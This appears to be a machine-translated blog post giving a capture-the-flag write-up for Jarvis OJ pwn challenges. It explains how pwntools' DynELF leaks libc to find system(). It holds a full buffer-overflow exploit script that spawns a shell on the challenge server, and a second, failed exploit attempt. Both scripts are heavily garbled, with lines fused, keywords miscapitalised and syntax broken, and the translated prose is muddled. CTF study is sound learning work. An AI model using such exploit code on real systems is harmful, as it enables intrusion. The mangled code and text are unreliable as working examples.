Jarvis OJ Part writeup

Level 0

Level simple shellcode Use

Level 2

Level 3--RET2LIBC Try

LEVEL2&LEVEL3 x64

Level 4--dynelf

Level 5

Level 6

Level4--dynelf

Dynelf is a tool that obtains a function address in the absence of a libc file, through the reading of any address

Typically, you can determine the LIBC version by leak the address stored in the two function got to get the desired function address

LIBC version Query

However, you can use Dynelf to search in memory in cases where the library cannot determine the version. But Dynelf is easy to time out, use caution

Take Level4 as an example, simply record the usage of dynelf get file

Program protection and program vulnerabilities are not set barriers, can be directly through a read implementation overflow

It is not possible to find the LIBC version through the addresses in Write.got and Read.got, nor is it convenient to implement System_call

So you can get the address of the system function with Dynelf, and then write "/bin/sh" to the BSS section to get the shell

#!/usr/bin/env python#Coding=utf-8 fromPwnImport*#context.log_level = "Debug"IO = Remote ("pwn2.jarvisoj.com", 9880) Elf= ELF ("./level4")#Plt.gotREAD_PLT = elf.plt["Read"]WRITE_PLT= elf.plt["Write"]vuln_addr= 0x804844bmain_addr= 0x8048470bss_addr= 0x804a024defLeak (address): Payload='a'* (0x88+0x4) Payload+ = P32 (WRITE_PLT) +P32 (VULN_ADDR) # is able to recycle exploits payload+ = P32 (1) + P32 (address) + P32 (4# Data as long as 4 byte length io.send (payload) Data= IO.RECV (4)    Print "% #x =%s"% (address, (dataor "'). Encode ('Hex'))    returnDatadyn= dynelf (leak,elf = Elf ("./level4"))sys_addr= Dyn.lookup ("__libc_system","libc")#print Hex (sys_addr)Payload='a'* (0x88 + 0x4) Payload+ = P32 (READ_PLT) +P32 (SYS_ADDR) payload+ = P32 (1) + P32 (bss_addr) + P32 (10) io.send (payload) io.sendline ("/bin/sh") io.interactive ()

A more detailed introduction to Dynelf: A https://www.anquanke.com/post/id/85129 more theological note

Another very_overflow also want to try this method, is the use of puts structure leak function

I think the theory and level4 are equally feasible, but failed to get the system address successfully

Scripts and errors as follows, looking through the road of the great God help pointing twos

#!/usr/bin/env python#-*-coding=utf-8-*- fromPwnImport*Context.log_level="Debug"#io = remote ("hackme.inndy.tw", 7705)IO = Process ("./very_overflow") Elf= ELF ("./very_overflow") puts_addr= elf.plt["puts"]puts_got= elf.got["puts"]vuln_addr= 0x8048853defDebug (): Raw_input ("enter>>")    #gdb.stop ()Gdb.attach (IO)defFill (): SSS='a'* 128 forIinchRange (128): Io.recvuntil ("Action:") Io.sendline ("1") Io.recvuntil ("Note:") Io.sendline (SSS)defLeak (Address): Count=0 Data="'Fill () Io.recvuntil ("Action:")    #Io.sendline ("3") Io.recvuntil ("Show:") Io.sendline ("127") Io.recvuntil ("Action:") Io.sendline ("1")    #MZIo.recvuntil ("Note:") debug () payload= P32 (0) +'a'* 12Payload+ = P32 (puts_addr) + P32 (VULN_ADDR) +P32 (address)#Debug ()io.sendline (payload)#Note IDIo.recvline ()#putsup ="'         while1: C= IO.RECV (1) Count+ = 1ifup = ='\ n'  andc = ='1': data[-1] ='\x00'             Break        Else: Data+=C up=CPrintData Data= Data[:4]    " "For I in range (4): Data + = IO.RECV (numb = 1,timeout = 1)" "    Print "% #x =%s"% (address, (dataor "'). Encode ('Hex'))    returnDatadyn= dynelf (leak,elf = Elf ("./very_overflow")) Sys_addr= Dyn.lookup ("__libc_system","libc")PrintHex (SYS_ADDR)" "Io.recvuntil ("Action:") Io.sendline ("3") Io.recvuntil ("Show:") Io.sendline ("127") io.recvline () Switch_addr = Io.recvline () [10:-1]print switch_addr" "

Thank the big boys for their advice!

Spicy Chicken with small spectrum
Source: http://www.cnblogs.com/ZHijack/
If there is reproduced, the pleasure! Please mark the source;

Jarvis OJ Part writeup